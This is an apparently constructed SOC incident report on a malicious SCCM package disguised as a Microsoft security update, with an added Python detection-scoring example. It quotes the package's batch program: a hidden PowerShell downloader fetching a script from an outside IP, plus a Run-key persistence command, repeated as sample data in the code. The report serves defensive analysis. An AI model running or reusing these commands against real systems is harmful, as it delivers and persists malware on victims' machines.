T1072 – Software Deployment Tools (SCCM Logs Detection)

SCCM Alert Details
Alert ID: SCCM-SOFTWARE-DEPLOY-1072-7842
Alert Time: 2024-02-14 10:45:22 EST
Severity: HIGH (82/100)
Source: Microsoft Endpoint Configuration Manager (SCCM)
Rule: “Unauthorized Software Package Deployment”
MITRE ATT&CK: T1072 – Software Deployment Tools

Alert Details:

Detection: Unauthorized package deployed via SCCM to multiple endpoints

Package Details:

– Package ID: PKG00045

– Package Name: “Critical Security Update – KB5001234”

– Created By: DOMAIN\svc_sccm_admin (Service Account)

– Created Time: 10:30 EST

– Deployment: Available to “All Workstations” collection (2,500+ endpoints)

– Program: “install_update.bat”

Program Content (install_update.bat):

@echo off
powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri http://185.143.221[.]89/update.ps1 -OutFile %temp%\update.ps1; powershell -ExecutionPolicy Bypass -File %temp%\update.ps1"
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v WindowsUpdate /t REG_SZ /d "powershell -WindowStyle Hidden -File %temp%\update.ps1" /f

Anomaly Detection:

– Package name mimics legitimate Microsoft security update

– Created by service account (svc_sccm_admin) that normally does not create packages

– Source IP for package creation: 10.0.45.67 (unusual for admin)

– Package deployed to all workstations (unusual scope)

– Contains PowerShell downloader

Deployment Status:

– 47 endpoints received package before alert

– 0 endpoints executed (SCCM enforcement runs at 11:00)

– Alert triggered before execution
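The anomaly criteria the alert lists (update-lookalike name, creator with no package history, unusual console IP, broad collection, PowerShell downloader, Run-key persistence) can be expressed as a small scoring rule over SCCM package-creation records. The following is an added example, not the SCCM rule or any code from the incident; the sample records, the creator/IP baseline and the weights are constructed assumptions.

```python
import re

# Constructed sample records modelled on the alert above; not real SCCM log output.
SAMPLE_PACKAGES = [
    {"package_id": "PKG00045", "name": "Critical Security Update - KB5001234",
     "created_by": "DOMAIN\\svc_sccm_admin", "source_ip": "10.0.45.67",
     "collection": "All Workstations",
     "program": "@echo off\r\n"
                "powershell -WindowStyle Hidden -Command \"Invoke-WebRequest -Uri "
                "http://185.143.221[.]89/update.ps1 -OutFile %temp%\\update.ps1\"\r\n"
                "reg add HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run /v WindowsUpdate "
                "/t REG_SZ /d \"powershell -File %temp%\\update.ps1\" /f\r\n"},
    {"package_id": "PKG00046", "name": "7-Zip 23.01 x64", "created_by": "DOMAIN\\jdoe",
     "source_ip": "10.0.10.15", "collection": "IT-Pilot-Workstations",
     "program": "msiexec /i 7z2301-x64.msi /qn"},
]

# Assumed baseline: principals that normally create packages, and the console IPs they use.
CREATOR_BASELINE = {"DOMAIN\\jdoe": {"10.0.10.15", "10.0.10.16"}}
BROAD_COLLECTIONS = {"all workstations", "all systems", "all desktop and server clients"}

UPDATE_LOOKALIKE = re.compile(r"\bKB\d{6,7}\b|security update", re.I)
DOWNLOADER = re.compile(r"powershell.*?(invoke-webrequest|\biwr\b|downloadstring|"
                        r"downloadfile|start-bitstransfer)", re.I | re.S)
RUN_KEY = re.compile(r"reg(\.exe)?\s+add\s+.*currentversion\\run\b", re.I)

def score_package(pkg, baseline=CREATOR_BASELINE):
    """Return (score 0-100, reasons) for one record; weights are illustrative, not SCCM's."""
    hits = []
    creator, ip = pkg["created_by"], pkg["source_ip"]
    if UPDATE_LOOKALIKE.search(pkg["name"]):
        hits.append((15, "name mimics a Microsoft update"))
    if creator not in baseline:
        hits.append((25, f"{creator} has no package-creation history"))
    elif ip not in baseline[creator]:
        hits.append((15, f"{ip} is not a known console IP for {creator}"))
    if pkg["collection"].lower() in BROAD_COLLECTIONS:
        hits.append((20, "deployed to a broad collection"))
    if DOWNLOADER.search(pkg["program"]):
        hits.append((25, "program contains a PowerShell downloader"))
    if RUN_KEY.search(pkg["program"]):
        hits.append((15, "program adds a Run-key persistence entry"))
    return min(100, sum(w for w, _ in hits)), [r for _, r in hits]

def triage(packages):
    """Label every record: HIGH at 70 or more, MEDIUM at 40 or more, else LOW."""
    labels = {}
    for pkg in packages:
        score, _ = score_package(pkg)
        labels[pkg["package_id"]] = "HIGH" if score >= 70 else "MEDIUM" if score >= 40 else "LOW"
    return labels
```

Feeding real records would mean mapping the SCCM package and deployment tables (or SMSProv/console audit logs) into the same dictionary fields; the baseline should be built from the site's own history rather than hard-coded.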

SOC Investigation Process

Step | Action | Tools Used | Findings
--- | --- | --- | ---
1. Alert Validation | Verify SCCM logs and package | SCCM Console | Confirmed unauthorized package
2. Immediate Action | Delete package, remove deployments | SCCM | Package deleted; deployments removed
3. Service Account Investigation | Check svc_sccm_admin activity | Azure AD, CrowdStrike | Service account credentials compromised (password in pastebin)
4. Affected Endpoints | Identify endpoints that received package | SCCM Logs | 47 endpoints; none executed (alert before enforcement)
5. Credential Rotation | Rotate service account password | Azure AD, AD | Password rotated; account disabled temporarily
6. Threat Hunting | Check for other unauthorized packages | SCCM Logs | No other packages found

Jira Incident Report
Ticket: SOC-2024-074
Summary: T1072 – Unauthorized Malicious Package Deployed via SCCM
Status: RESOLVED
Resolution: MALICIOUS – Package Removed Before Execution
Priority: P1 – HIGH
Labels: T1072, software-deployment, sccm, supply-chain, service-account-compromise
Components: Endpoint-Management, Identity-Management

INCIDENT ANALYSIS REPORT

1. Initial Context:

Detection Source: Microsoft Endpoint Configuration Manager (SCCM) logs.
Alert: “Unauthorized Software Package Deployment”.
Package: “Critical Security Update – KB5001234” (malicious).
Time: 2024-02-14 10:45 EST.
Technique: MITRE ATT&CK T1072 – Software Deployment Tools.

2. Technical Analysis:

Attack Chain:

1. Attacker obtained svc_sccm_admin credentials (password reused from LinkedIn breach)

2. Logged into SCCM console from IP 10.0.45.67 (internal)

3. Created malicious package mimicking Microsoft security update

4. Deployed to “All Workstations” collection (2,500+ endpoints)

5. Package would execute PowerShell downloader at 11:00

6. Alert triggered before execution

Malicious Package:

Name: “Critical Security Update – KB5001234”
Program: install_update.bat
Payload: PowerShell downloads update.ps1 from 185.143.221[.]89
Persistence: Adds registry run key for future execution

Service Account Compromise:

Account: svc_sccm_admin
Credentials found on pastebin (from LinkedIn breach)
Password not changed in 2 years
No MFA on service account

Affected Endpoints:

47 endpoints received package before deletion
None executed (enforcement time 11:00)
All endpoints scanned (clean)

3. Investigation Findings:

Timeline:

10:00 – Attacker logs into SCCM console

10:05 – Creates malicious package

10:10 – Deploys to All Workstations collection

10:30 – Package creation logged

10:45 – SOC alert triggered

10:47 – Package deleted

10:50 – Service account disabled

Indicators of Compromise (IoCs):

SCCM:

– Package ID: PKG00045

– Package Name: “Critical Security Update – KB5001234”

Network:

– Download URL: http://185.143.221[.]89/update.ps1

Account:

– svc_sccm_admin (compromised)

4. Containment Actions:

Immediate Actions:

Deleted malicious package from SCCM.
Removed all deployments.
Disabled svc_sccm_admin account.
Blocked download URL at firewall.

Endpoint Remediation:

Scanned all 47 affected endpoints (clean).
No further action needed.

Credential Remediation:

Rotated service account password.
Enforced MFA for all service accounts.
Audited all service account permissions.

5. Root Cause Analysis:

Primary Cause: Compromised service account credentials (password reuse).
Contributing Factors:
No MFA on service account.
Password not rotated in 2 years.
SCCM console accessible from internal network without additional controls.

6. Business Impact:

Operational Impact: None (package removed before execution).
Data Exposure: None.
Reputational Impact: Potential if package had executed.

7. Remediation & Prevention:

Completed Actions:

Package removed.
Service account secured.
Affected endpoints verified clean.

Technical Controls Enhanced:

Enforced MFA for all administrative accounts.
Implemented Just-In-Time (JIT) access for SCCM console.
Added approval workflow for all package deployments.
Enhanced monitoring for unusual package creation.

8. Conclusion:

Attackers compromised an SCCM service account and created a malicious package targeting all workstations. Detection occurred before execution, preventing widespread compromise. Enhanced controls now protect against similar attacks.

Closure Rationale: Package removed; account secured; controls enhanced.

Analyst: [Walter White], SOC Analyst
Date: 2024-02-14 12:00 EST